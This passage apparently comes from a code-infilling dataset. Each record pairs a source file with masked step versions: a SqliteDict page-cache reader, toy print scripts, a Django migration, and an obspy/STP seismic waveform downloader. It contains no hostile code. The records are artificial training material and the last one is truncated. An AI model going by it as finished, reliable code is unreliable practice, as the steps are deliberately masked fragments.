parser.add_argument('--dnscache', default="dnscache.sqld", help='IP address cache default: %(default)s')
parser.add_argument('--download', default="pages.sqld", help='Here is where the downloaded pages go: %(default)s')
parser.add_argument('--r404', default="404.sqld", help='Here is where we remember pages that gave 404 etc: %(default)s')
args = parser.parse_args()
#2) Results setup
result_store = SqliteDict(args.download, encode=gz_encode, decode=gz_decode, autocommit=True)
for url,cont in result_store.items():
print(url,cont[:30])
#3) 404 setup
r404 = SqliteDict(args.r404, autocommit=True)
for url,status in r404.items():
print(url,status)
|
normal
|
{
"blob_id": "295d6a66335491b406f47212064da9fd5fca6eb6",
"index": 6812,
"step-1": "<mask token>\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.\n HIGHEST_PROTOCOL)))\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.\n HIGHEST_PROTOCOL)))\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dnscache', default='dnscache.sqld', help=\n 'IP address cache default: %(default)s')\n parser.add_argument('--download', default='pages.sqld', help=\n 'Here is where the downloaded pages go: %(default)s')\n parser.add_argument('--r404', default='404.sqld', help=\n 'Here is where we remember pages that gave 404 etc: %(default)s')\n args = parser.parse_args()\n result_store = SqliteDict(args.download, encode=gz_encode, decode=\n gz_decode, autocommit=True)\n for url, cont in result_store.items():\n print(url, cont[:30])\n r404 = SqliteDict(args.r404, autocommit=True)\n for url, status in r404.items():\n print(url, status)\n",
"step-4": "from sqlitedict import SqliteDict\nimport sys\nimport socket\nimport urllib\nimport argparse\nimport zlib, pickle, sqlite3\nimport random\nfrom datetime import datetime\nimport time\nfrom urllib.parse import urlparse\nimport hashlib\nimport subprocess\nimport requests\nfrom multiprocessing import Pool\n\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.\n HIGHEST_PROTOCOL)))\n\n\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dnscache', default='dnscache.sqld', help=\n 'IP address cache default: %(default)s')\n parser.add_argument('--download', default='pages.sqld', help=\n 'Here is where the downloaded pages go: %(default)s')\n parser.add_argument('--r404', default='404.sqld', help=\n 'Here is where we remember pages that gave 404 etc: %(default)s')\n args = parser.parse_args()\n result_store = SqliteDict(args.download, encode=gz_encode, decode=\n gz_decode, autocommit=True)\n for url, cont in result_store.items():\n print(url, cont[:30])\n r404 = SqliteDict(args.r404, autocommit=True)\n for url, status in r404.items():\n print(url, status)\n",
"step-5": "from sqlitedict import SqliteDict\nimport sys\nimport socket\nimport urllib\nimport argparse\nimport zlib, pickle, sqlite3\nimport random\nfrom datetime import datetime\nimport time\nfrom urllib.parse import urlparse\nimport hashlib\nimport subprocess\nimport requests\nfrom multiprocessing import Pool\n\ndef gz_encode(obj):\n return sqlite3.Binary(zlib.compress(pickle.dumps(obj, pickle.HIGHEST_PROTOCOL)))\ndef gz_decode(obj):\n return pickle.loads(zlib.decompress(bytes(obj)))\n\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--dnscache', default=\"dnscache.sqld\", help='IP address cache default: %(default)s')\n parser.add_argument('--download', default=\"pages.sqld\", help='Here is where the downloaded pages go: %(default)s')\n parser.add_argument('--r404', default=\"404.sqld\", help='Here is where we remember pages that gave 404 etc: %(default)s')\n args = parser.parse_args()\n\n #2) Results setup\n result_store = SqliteDict(args.download, encode=gz_encode, decode=gz_decode, autocommit=True)\n\n for url,cont in result_store.items():\n print(url,cont[:30])\n \n #3) 404 setup\n r404 = SqliteDict(args.r404, autocommit=True)\n for url,status in r404.items():\n print(url,status)\n \n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
a=10
b=20
c=400
d=100
e=500
f=30
z=a+b+c+d+e+f
print "The total sum is",z
print "variable d added"
print "Variable e added"
print "Variable f is equal to 30"
print "You are coming from test branch"
print "Your are very new in this branch"
|
normal
|
{
"blob_id": "700d876dd45548b74b563ed86f8124fa666e1739",
"index": 2588,
"step-1": "a=10\nb=20\nc=400\nd=100\ne=500\nf=30\nz=a+b+c+d+e+f\nprint \"The total sum is\",z\nprint \"variable d added\"\nprint \"Variable e added\"\nprint \"Variable f is equal to 30\"\nprint \"You are coming from test branch\"\nprint \"Your are very new in this branch\"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Generated by Django 2.0.1 on 2018-05-01 11:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rover', '0002_auto_20180501_1431'),
]
operations = [
migrations.CreateModel(
name='RoverPage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('design_review', models.FileField(blank=True, upload_to='documents/rover')),
],
options={
'verbose_name_plural': 'Rover Page',
'verbose_name': 'Rover Page',
},
),
]
|
normal
|
{
"blob_id": "fed94e0affa1fe6c705577a63fabee839aa9f05c",
"index": 5096,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('rover', '0002_auto_20180501_1431')]\n operations = [migrations.CreateModel(name='RoverPage', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('design_review', models.FileField(\n blank=True, upload_to='documents/rover'))], options={\n 'verbose_name_plural': 'Rover Page', 'verbose_name': 'Rover Page'})]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('rover', '0002_auto_20180501_1431')]\n operations = [migrations.CreateModel(name='RoverPage', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('design_review', models.FileField(\n blank=True, upload_to='documents/rover'))], options={\n 'verbose_name_plural': 'Rover Page', 'verbose_name': 'Rover Page'})]\n",
"step-5": "# Generated by Django 2.0.1 on 2018-05-01 11:46\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('rover', '0002_auto_20180501_1431'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='RoverPage',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('design_review', models.FileField(blank=True, upload_to='documents/rover')),\n ],\n options={\n 'verbose_name_plural': 'Rover Page',\n 'verbose_name': 'Rover Page',\n },\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
print(1/2 * 2) # division ret
|
normal
|
{
"blob_id": "2c1e51f2c392e77299463d95a2277b3d2ca7c299",
"index": 4336,
"step-1": "<mask token>\n",
"step-2": "print(1 / 2 * 2)\n",
"step-3": "print(1/2 * 2) # division ret\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
def test(x):
print x
|
normal
|
{
"blob_id": "78e008b4a51cdbbb81dead7bc5945ee98ccad862",
"index": 8266,
"step-1": "def test(x):\n print x\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
"""
@version:
author:yunnaidan
@time: 2019/07/22
@file: download_mseed.py
@function:
"""
from obspy.clients.fdsn import Client
from obspy.core import UTCDateTime
import numpy as np
import obspy
import os
import re
import time
import glob
import shutil
import platform
import subprocess
import multiprocessing
def load_stations(filename):
with open(filename, 'r') as f:
sta_data = f.readlines()
sta_list = []
for l in range(1, len(sta_data)):
sta_info = sta_data[l]
net_name = re.split(',', sta_info)[0]
sta_name = re.split(',', sta_info)[1]
chan_name = re.split(',', sta_info)[2]
sta_list.append([net_name, sta_name, chan_name])
return sta_list
def set_folders(out_path, startday, endday):
day = startday
while day <= endday:
year_folder = str(day.year).zfill(4)
day_folder = str(day.year).zfill(
4) + str(day.month).zfill(2) + str(day.day).zfill(2)
out_folder = os.path.join(out_path, year_folder, day_folder)
if not os.path.exists(out_folder):
os.makedirs(out_folder)
day = day + 86400
return None
def obspy_download(
client,
net_name,
sta_name,
chn_name,
starttime,
endtime,
out_path,
time_thre=10):
year_folder = str(starttime.year)
day_folder = str(starttime.year).zfill(
4) + str(starttime.month).zfill(2) + str(starttime.day).zfill(2)
out_folder = os.path.join(out_path, year_folder, day_folder)
outfile = os.path.join(
out_folder, net_name + '.' + sta_name + '.' + chn_name + '.mseed')
# Incremental download
if not os.path.exists(outfile):
t = 0
flag = False
while flag == False and t < time_thre:
try:
client.get_waveforms(
network=net_name,
station=sta_name,
location='--',
channel=chn_name,
starttime=starttime,
endtime=endtime,
filename=outfile)
flag = True
except BaseException:
pass
time.sleep(0.5)
t += 1
if not flag:
with open('download.log', 'a') as f:
f.write('No data: ' + outfile + '\n')
return None
def obspy_download_parallel(
data_center,
startday,
endday,
sta_file,
out_path,
cores=1):
set_folders(out_path, startday, endday)
sta_list = load_stations(sta_file)
with open('download.log', 'a') as f:
f.write('>>> ' + str(time.localtime(time.time())) + '\n')
f.write('The number of stations is: ' + str(len(sta_list)) + '\n')
day = startday
while day <= endday:
t_b = time.time()
with open('download.log', 'a') as f:
f.write('Day: ' + str(day) + '\n')
print(day)
starttime = day
endtime = day + 86400
client = Client(data_center)
if cores == 1:
for i in range(len(sta_list)):
sta = sta_list[i]
print (sta)
net_name = sta[0]
sta_name = sta[1]
chan_name = sta[2]
obspy_download(
client,
net_name,
sta_name,
chan_name,
starttime,
endtime,
out_path)
else:
pass
t_e = time.time()
with open('download.log', 'a') as f:
f.write('Using time: ' + str(t_e - t_b) + '\n')
day = day + 86400
return None
def stp_run_download(sta_list, download_date, out_path):
with open('download.log', 'a') as f:
f.write(str(download_date) + '\n')
tb = time.time()
year = str(download_date.year).zfill(4)
month = str(download_date.month).zfill(2)
day = str(download_date.day).zfill(2)
day_folder = year + month + day
out_folder = os.path.join(out_path, year, day_folder)
out_folder_old = os.path.join(out_path + '_old', year, day_folder)
p = subprocess.Popen(['stp'], stdin=subprocess.PIPE)
s = "MSEED \n"
for i in range(len(sta_list)):
sta = sta_list[i]
net_name = sta[0]
sta_name = sta[1]
chan_name = sta[2]
out_sta_file = glob.glob(
os.path.join(
out_folder_old, '*%s.%s.%s*' %
(net_name, sta_name, chan_name)))
if len(out_sta_file) == 0:
s += "WIN {} {} {} {}/{}/{},00:00:00 +1d \n".format(
net_name, sta_name, chan_name, year, month, day)
s += "quit \n"
p.communicate(s.encode())
out_files = glob.glob('%s%s%s*.*' % (year, month, day))
for out_file in out_files:
shutil.move(out_file, out_folder)
te = time.time()
with open('download.log', 'a') as f:
f.write('Using time: ' + str(te - tb) + '\n')
def stp_download_parallel(startday, endday, sta_file, out_path, cores=1):
'''
:param startday: obspy.core.utcdatetime.UTCDateTime
:param endday: obspy.core.utcdatetime.UTCDateTime
:param sta_file: Network,Station,Channel,Latitude,Longitude
:param out_path:
:param cores:
:return:
'''
if os.path.exists('download.log'):
os.remove('download.log')
with open('download.log', 'a') as f:
f.write('>>> ' + str(time.localtime(time.time())) + '\n')
set_folders(out_path, startday, endday)
sta_list = load_stations(sta_file)
pool = multiprocessing.Pool(processes=cores)
tasks = []
day = startday
while day <= endday:
print(day)
# tasks.append((sta_list, day, out_path))
stp_run_download(sta_list, day, out_path)
day = day + 86400
'''
# chunksize is how many tasks will be processed by one processor
rs = pool.starmap_async(stp_run_download, tasks, chunksize=1)
# close() & join() is necessary
# No more work
pool.close()
# simple progress bar
while (True):
remaining = rs._number_left
print("finished:{0}/{1}".format(len(tasks) - remaining, len(tasks)),
end='\r') # '\r' means remove the last line
if (rs.ready()):
break
time.sleep(0.5)
# Wait for completion
pool.join()
'''
return None
if __name__ == '__main__':
LOCAL_PATH = '/Users/yunnaidan/Project/Dynamic_Triggering/Workspace/Central_California'
REMOTE_PATH = '/home/yunnd/Workspace/Dynamic_triggering/Central_California'
if platform.system() == 'Darwin':
ROOT_PATH = LOCAL_PATH
if platform.system() == 'Linux':
ROOT_PATH = REMOTE_PATH
startday = UTCDateTime('2009-01-03')
endday = UTCDateTime('2009-01-05')
sta_file = os.path.join(
ROOT_PATH,
'data/station_info/stations_CI_selected_for_download_BH.txt')
out_path = os.path.join(ROOT_PATH, 'data/time_series/raw_data/mseed')
data_center = 'SCEDC'
obspy_download_parallel(
data_center,
startday,
endday,
sta_file,
out_path,
cores=1)
# stp_download_parallel(startday, endday, sta_file, out_path, cores=15)
pass
|
normal
|
{
"blob_id": "34db3c9998e1d7647dd954e82e18147504cc74fc",
"index": 6736,
"step-1": "<mask token>\n\n\ndef load_stations(filename):\n with open(filename, 'r') as f:\n sta_data = f.readlines()\n sta_list = []\n for l in range(1, len(sta_data)):\n sta_info = sta_data[l]\n net_name = re.split(',', sta_info)[0]\n sta_name = re.split(',', sta_info)[1]\n chan_name = re.split(',', sta_info)[2]\n sta_list.append([net_name, sta_name, chan_name])\n return sta_list\n\n\n<mask token>\n\n\ndef obspy_download_parallel(data_center, startday, endday, sta_file,\n out_path, cores=1):\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n f.write('The number of stations is: ' + str(len(sta_list)) + '\\n')\n day = startday\n while day <= endday:\n t_b = time.time()\n with open('download.log', 'a') as f:\n f.write('Day: ' + str(day) + '\\n')\n print(day)\n starttime = day\n endtime = day + 86400\n client = Client(data_center)\n if cores == 1:\n for i in range(len(sta_list)):\n sta = sta_list[i]\n print(sta)\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n obspy_download(client, net_name, sta_name, chan_name,\n starttime, endtime, out_path)\n else:\n pass\n t_e = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(t_e - t_b) + '\\n')\n day = day + 86400\n return None\n\n\n<mask token>\n\n\ndef stp_download_parallel(startday, endday, sta_file, out_path, cores=1):\n \"\"\"\n\n :param startday: obspy.core.utcdatetime.UTCDateTime\n :param endday: obspy.core.utcdatetime.UTCDateTime\n :param sta_file: Network,Station,Channel,Latitude,Longitude\n :param out_path:\n :param cores:\n :return:\n \"\"\"\n if os.path.exists('download.log'):\n os.remove('download.log')\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n pool = multiprocessing.Pool(processes=cores)\n tasks = []\n day = startday\n while day <= endday:\n print(day)\n stp_run_download(sta_list, day, out_path)\n day = day + 86400\n '\\n # chunksize is how many tasks will be processed by one processor\\n rs = pool.starmap_async(stp_run_download, tasks, chunksize=1)\\n # close() & join() is necessary\\n # No more work\\n pool.close()\\n\\n # simple progress bar\\n while (True):\\n remaining = rs._number_left\\n print(\"finished:{0}/{1}\".format(len(tasks) - remaining, len(tasks)),\\n end=\\'\\r\\') # \\'\\r\\' means remove the last line\\n if (rs.ready()):\\n break\\n time.sleep(0.5)\\n\\n # Wait for completion\\n pool.join()\\n '\n return None\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef load_stations(filename):\n with open(filename, 'r') as f:\n sta_data = f.readlines()\n sta_list = []\n for l in range(1, len(sta_data)):\n sta_info = sta_data[l]\n net_name = re.split(',', sta_info)[0]\n sta_name = re.split(',', sta_info)[1]\n chan_name = re.split(',', sta_info)[2]\n sta_list.append([net_name, sta_name, chan_name])\n return sta_list\n\n\ndef set_folders(out_path, startday, endday):\n day = startday\n while day <= endday:\n year_folder = str(day.year).zfill(4)\n day_folder = str(day.year).zfill(4) + str(day.month).zfill(2) + str(day\n .day).zfill(2)\n out_folder = os.path.join(out_path, year_folder, day_folder)\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n day = day + 86400\n return None\n\n\n<mask token>\n\n\ndef obspy_download_parallel(data_center, startday, endday, sta_file,\n out_path, cores=1):\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n f.write('The number of stations is: ' + str(len(sta_list)) + '\\n')\n day = startday\n while day <= endday:\n t_b = time.time()\n with open('download.log', 'a') as f:\n f.write('Day: ' + str(day) + '\\n')\n print(day)\n starttime = day\n endtime = day + 86400\n client = Client(data_center)\n if cores == 1:\n for i in range(len(sta_list)):\n sta = sta_list[i]\n print(sta)\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n obspy_download(client, net_name, sta_name, chan_name,\n starttime, endtime, out_path)\n else:\n pass\n t_e = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(t_e - t_b) + '\\n')\n day = day + 86400\n return None\n\n\ndef stp_run_download(sta_list, download_date, out_path):\n with open('download.log', 'a') as f:\n f.write(str(download_date) + '\\n')\n tb = time.time()\n year = str(download_date.year).zfill(4)\n month = str(download_date.month).zfill(2)\n day = str(download_date.day).zfill(2)\n day_folder = year + month + day\n out_folder = os.path.join(out_path, year, day_folder)\n out_folder_old = os.path.join(out_path + '_old', year, day_folder)\n p = subprocess.Popen(['stp'], stdin=subprocess.PIPE)\n s = 'MSEED \\n'\n for i in range(len(sta_list)):\n sta = sta_list[i]\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n out_sta_file = glob.glob(os.path.join(out_folder_old, '*%s.%s.%s*' %\n (net_name, sta_name, chan_name)))\n if len(out_sta_file) == 0:\n s += 'WIN {} {} {} {}/{}/{},00:00:00 +1d \\n'.format(net_name,\n sta_name, chan_name, year, month, day)\n s += 'quit \\n'\n p.communicate(s.encode())\n out_files = glob.glob('%s%s%s*.*' % (year, month, day))\n for out_file in out_files:\n shutil.move(out_file, out_folder)\n te = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(te - tb) + '\\n')\n\n\ndef stp_download_parallel(startday, endday, sta_file, out_path, cores=1):\n \"\"\"\n\n :param startday: obspy.core.utcdatetime.UTCDateTime\n :param endday: obspy.core.utcdatetime.UTCDateTime\n :param sta_file: Network,Station,Channel,Latitude,Longitude\n :param out_path:\n :param cores:\n :return:\n \"\"\"\n if os.path.exists('download.log'):\n os.remove('download.log')\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n pool = multiprocessing.Pool(processes=cores)\n tasks = []\n day = startday\n while day <= endday:\n print(day)\n stp_run_download(sta_list, day, out_path)\n day = day + 86400\n '\\n # chunksize is how many tasks will be processed by one processor\\n rs = pool.starmap_async(stp_run_download, tasks, chunksize=1)\\n # close() & join() is necessary\\n # No more work\\n pool.close()\\n\\n # simple progress bar\\n while (True):\\n remaining = rs._number_left\\n print(\"finished:{0}/{1}\".format(len(tasks) - remaining, len(tasks)),\\n end=\\'\\r\\') # \\'\\r\\' means remove the last line\\n if (rs.ready()):\\n break\\n time.sleep(0.5)\\n\\n # Wait for completion\\n pool.join()\\n '\n return None\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef load_stations(filename):\n with open(filename, 'r') as f:\n sta_data = f.readlines()\n sta_list = []\n for l in range(1, len(sta_data)):\n sta_info = sta_data[l]\n net_name = re.split(',', sta_info)[0]\n sta_name = re.split(',', sta_info)[1]\n chan_name = re.split(',', sta_info)[2]\n sta_list.append([net_name, sta_name, chan_name])\n return sta_list\n\n\ndef set_folders(out_path, startday, endday):\n day = startday\n while day <= endday:\n year_folder = str(day.year).zfill(4)\n day_folder = str(day.year).zfill(4) + str(day.month).zfill(2) + str(day\n .day).zfill(2)\n out_folder = os.path.join(out_path, year_folder, day_folder)\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n day = day + 86400\n return None\n\n\ndef obspy_download(client, net_name, sta_name, chn_name, starttime, endtime,\n out_path, time_thre=10):\n year_folder = str(starttime.year)\n day_folder = str(starttime.year).zfill(4) + str(starttime.month).zfill(2\n ) + str(starttime.day).zfill(2)\n out_folder = os.path.join(out_path, year_folder, day_folder)\n outfile = os.path.join(out_folder, net_name + '.' + sta_name + '.' +\n chn_name + '.mseed')\n if not os.path.exists(outfile):\n t = 0\n flag = False\n while flag == False and t < time_thre:\n try:\n client.get_waveforms(network=net_name, station=sta_name,\n location='--', channel=chn_name, starttime=starttime,\n endtime=endtime, filename=outfile)\n flag = True\n except BaseException:\n pass\n time.sleep(0.5)\n t += 1\n if not flag:\n with open('download.log', 'a') as f:\n f.write('No data: ' + outfile + '\\n')\n return None\n\n\ndef obspy_download_parallel(data_center, startday, endday, sta_file,\n out_path, cores=1):\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n f.write('The number of stations is: ' + str(len(sta_list)) + '\\n')\n day = startday\n while day <= endday:\n t_b = time.time()\n with open('download.log', 'a') as f:\n f.write('Day: ' + str(day) + '\\n')\n print(day)\n starttime = day\n endtime = day + 86400\n client = Client(data_center)\n if cores == 1:\n for i in range(len(sta_list)):\n sta = sta_list[i]\n print(sta)\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n obspy_download(client, net_name, sta_name, chan_name,\n starttime, endtime, out_path)\n else:\n pass\n t_e = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(t_e - t_b) + '\\n')\n day = day + 86400\n return None\n\n\ndef stp_run_download(sta_list, download_date, out_path):\n with open('download.log', 'a') as f:\n f.write(str(download_date) + '\\n')\n tb = time.time()\n year = str(download_date.year).zfill(4)\n month = str(download_date.month).zfill(2)\n day = str(download_date.day).zfill(2)\n day_folder = year + month + day\n out_folder = os.path.join(out_path, year, day_folder)\n out_folder_old = os.path.join(out_path + '_old', year, day_folder)\n p = subprocess.Popen(['stp'], stdin=subprocess.PIPE)\n s = 'MSEED \\n'\n for i in range(len(sta_list)):\n sta = sta_list[i]\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n out_sta_file = glob.glob(os.path.join(out_folder_old, '*%s.%s.%s*' %\n (net_name, sta_name, chan_name)))\n if len(out_sta_file) == 0:\n s += 'WIN {} {} {} {}/{}/{},00:00:00 +1d \\n'.format(net_name,\n sta_name, chan_name, year, month, day)\n s += 'quit \\n'\n p.communicate(s.encode())\n out_files = glob.glob('%s%s%s*.*' % (year, month, day))\n for out_file in out_files:\n shutil.move(out_file, out_folder)\n te = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(te - tb) + '\\n')\n\n\ndef stp_download_parallel(startday, endday, sta_file, out_path, cores=1):\n \"\"\"\n\n :param startday: obspy.core.utcdatetime.UTCDateTime\n :param endday: obspy.core.utcdatetime.UTCDateTime\n :param sta_file: Network,Station,Channel,Latitude,Longitude\n :param out_path:\n :param cores:\n :return:\n \"\"\"\n if os.path.exists('download.log'):\n os.remove('download.log')\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n pool = multiprocessing.Pool(processes=cores)\n tasks = []\n day = startday\n while day <= endday:\n print(day)\n stp_run_download(sta_list, day, out_path)\n day = day + 86400\n '\\n # chunksize is how many tasks will be processed by one processor\\n rs = pool.starmap_async(stp_run_download, tasks, chunksize=1)\\n # close() & join() is necessary\\n # No more work\\n pool.close()\\n\\n # simple progress bar\\n while (True):\\n remaining = rs._number_left\\n print(\"finished:{0}/{1}\".format(len(tasks) - remaining, len(tasks)),\\n end=\\'\\r\\') # \\'\\r\\' means remove the last line\\n if (rs.ready()):\\n break\\n time.sleep(0.5)\\n\\n # Wait for completion\\n pool.join()\\n '\n return None\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef load_stations(filename):\n with open(filename, 'r') as f:\n sta_data = f.readlines()\n sta_list = []\n for l in range(1, len(sta_data)):\n sta_info = sta_data[l]\n net_name = re.split(',', sta_info)[0]\n sta_name = re.split(',', sta_info)[1]\n chan_name = re.split(',', sta_info)[2]\n sta_list.append([net_name, sta_name, chan_name])\n return sta_list\n\n\ndef set_folders(out_path, startday, endday):\n day = startday\n while day <= endday:\n year_folder = str(day.year).zfill(4)\n day_folder = str(day.year).zfill(4) + str(day.month).zfill(2) + str(day\n .day).zfill(2)\n out_folder = os.path.join(out_path, year_folder, day_folder)\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n day = day + 86400\n return None\n\n\ndef obspy_download(client, net_name, sta_name, chn_name, starttime, endtime,\n out_path, time_thre=10):\n year_folder = str(starttime.year)\n day_folder = str(starttime.year).zfill(4) + str(starttime.month).zfill(2\n ) + str(starttime.day).zfill(2)\n out_folder = os.path.join(out_path, year_folder, day_folder)\n outfile = os.path.join(out_folder, net_name + '.' + sta_name + '.' +\n chn_name + '.mseed')\n if not os.path.exists(outfile):\n t = 0\n flag = False\n while flag == False and t < time_thre:\n try:\n client.get_waveforms(network=net_name, station=sta_name,\n location='--', channel=chn_name, starttime=starttime,\n endtime=endtime, filename=outfile)\n flag = True\n except BaseException:\n pass\n time.sleep(0.5)\n t += 1\n if not flag:\n with open('download.log', 'a') as f:\n f.write('No data: ' + outfile + '\\n')\n return None\n\n\ndef obspy_download_parallel(data_center, startday, endday, sta_file,\n out_path, cores=1):\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n f.write('The number of stations is: ' + str(len(sta_list)) + '\\n')\n day = startday\n while day <= endday:\n t_b = time.time()\n with open('download.log', 'a') as f:\n f.write('Day: ' + str(day) + '\\n')\n print(day)\n starttime = day\n endtime = day + 86400\n client = Client(data_center)\n if cores == 1:\n for i in range(len(sta_list)):\n sta = sta_list[i]\n print(sta)\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n obspy_download(client, net_name, sta_name, chan_name,\n starttime, endtime, out_path)\n else:\n pass\n t_e = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(t_e - t_b) + '\\n')\n day = day + 86400\n return None\n\n\ndef stp_run_download(sta_list, download_date, out_path):\n with open('download.log', 'a') as f:\n f.write(str(download_date) + '\\n')\n tb = time.time()\n year = str(download_date.year).zfill(4)\n month = str(download_date.month).zfill(2)\n day = str(download_date.day).zfill(2)\n day_folder = year + month + day\n out_folder = os.path.join(out_path, year, day_folder)\n out_folder_old = os.path.join(out_path + '_old', year, day_folder)\n p = subprocess.Popen(['stp'], stdin=subprocess.PIPE)\n s = 'MSEED \\n'\n for i in range(len(sta_list)):\n sta = sta_list[i]\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n out_sta_file = glob.glob(os.path.join(out_folder_old, '*%s.%s.%s*' %\n (net_name, sta_name, chan_name)))\n if len(out_sta_file) == 0:\n s += 'WIN {} {} {} {}/{}/{},00:00:00 +1d \\n'.format(net_name,\n sta_name, chan_name, year, month, day)\n s += 'quit \\n'\n p.communicate(s.encode())\n out_files = glob.glob('%s%s%s*.*' % (year, month, day))\n for out_file in out_files:\n shutil.move(out_file, out_folder)\n te = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(te - tb) + '\\n')\n\n\ndef stp_download_parallel(startday, endday, sta_file, out_path, cores=1):\n \"\"\"\n\n :param startday: obspy.core.utcdatetime.UTCDateTime\n :param endday: obspy.core.utcdatetime.UTCDateTime\n :param sta_file: Network,Station,Channel,Latitude,Longitude\n :param out_path:\n :param cores:\n :return:\n \"\"\"\n if os.path.exists('download.log'):\n os.remove('download.log')\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n pool = multiprocessing.Pool(processes=cores)\n tasks = []\n day = startday\n while day <= endday:\n print(day)\n stp_run_download(sta_list, day, out_path)\n day = day + 86400\n '\\n # chunksize is how many tasks will be processed by one processor\\n rs = pool.starmap_async(stp_run_download, tasks, chunksize=1)\\n # close() & join() is necessary\\n # No more work\\n pool.close()\\n\\n # simple progress bar\\n while (True):\\n remaining = rs._number_left\\n print(\"finished:{0}/{1}\".format(len(tasks) - remaining, len(tasks)),\\n end=\\'\\r\\') # \\'\\r\\' means remove the last line\\n if (rs.ready()):\\n break\\n time.sleep(0.5)\\n\\n # Wait for completion\\n pool.join()\\n '\n return None\n\n\nif __name__ == '__main__':\n LOCAL_PATH = (\n '/Users/yunnaidan/Project/Dynamic_Triggering/Workspace/Central_California'\n )\n REMOTE_PATH = '/home/yunnd/Workspace/Dynamic_triggering/Central_California'\n if platform.system() == 'Darwin':\n ROOT_PATH = LOCAL_PATH\n if platform.system() == 'Linux':\n ROOT_PATH = REMOTE_PATH\n startday = UTCDateTime('2009-01-03')\n endday = UTCDateTime('2009-01-05')\n sta_file = os.path.join(ROOT_PATH,\n 'data/station_info/stations_CI_selected_for_download_BH.txt')\n out_path = os.path.join(ROOT_PATH, 'data/time_series/raw_data/mseed')\n data_center = 'SCEDC'\n obspy_download_parallel(data_center, startday, endday, sta_file,\n out_path, cores=1)\n pass\n",
